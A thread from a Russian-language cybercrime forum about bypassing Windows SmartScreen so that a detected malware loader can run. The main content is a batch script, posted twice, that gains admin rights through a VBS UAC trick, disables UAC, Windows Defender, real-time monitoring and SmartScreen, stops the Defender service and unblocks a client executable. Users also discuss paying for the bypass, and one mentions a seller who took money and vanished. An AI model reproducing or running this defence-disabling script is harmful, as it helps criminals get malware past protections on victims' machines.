• XSS.stack #1 – первый литературный журнал от юзеров форума

Smart Screen Bypass

В этой теме можно использовать автоматический гарант!

Новая сделка
Статус
Закрыто для дальнейших ответов.
Отслеживать
Лодер стал палиться , а криптануть не могу потому что обход смарта ломается. А тс не в сетичасто, когда заходит не может почистить его.
 
crypt0 сказал(а):
a simple .bat will do exactly this
heres an example (few more things added but does the same)

:: to get run as administrator
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
:: to save my path
set mypath=%~dp0
:: to stop uac
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
:: to kill client if working
taskkill /f /im client.exe
timeout 5 > NUL
::
powershell -Command "Function EnableDisableSmartScreen($status) {Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableSmartScreen" -Type DWord -Value 0;If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter")) {New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Force | Out-Null}Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Name "EnabledV9" -Type DWord -Value 0};Unblock-File -Path C:\system1\client.exe"
powershell -Command "& {Set-ExecutionPolicy UnRestricted;Set-MpPreference -DisableRealtimeMonitoring $true;sc config WinDefend start=disabled;sc stop WinDefend}"
Can you do it for me for money? Because he's been ignoring me for five days. He just took the money and disappeared.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
thecount сказал(а):
smart screan focun on exe most of the time as i understand
yup even legit softs also but it is still a needed part of any Maldevs vault of hidden bypasses and exploits
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Mellstroy сказал(а):
Can you do it for me for money? Because he's been ignoring me for five days. He just took the money and disappeared.
read DM
 
crypt0 сказал(а):
a simple .bat will do exactly this
heres an example (few more things added but does the same)

:: to get run as administrator
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
:: to save my path
set mypath=%~dp0
:: to stop uac
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
:: to kill client if working
taskkill /f /im client.exe
timeout 5 > NUL
::
powershell -Command "Function EnableDisableSmartScreen($status) {Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableSmartScreen" -Type DWord -Value 0;If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter")) {New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Force | Out-Null}Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Name "EnabledV9" -Type DWord -Value 0};Unblock-File -Path C:\system1\client.exe"
powershell -Command "& {Set-ExecutionPolicy UnRestricted;Set-MpPreference -DisableRealtimeMonitoring $true;sc config WinDefend start=disabled;sc stop WinDefend}"
how to make it work?
 
Статус
Закрыто для дальнейших ответов.
Верх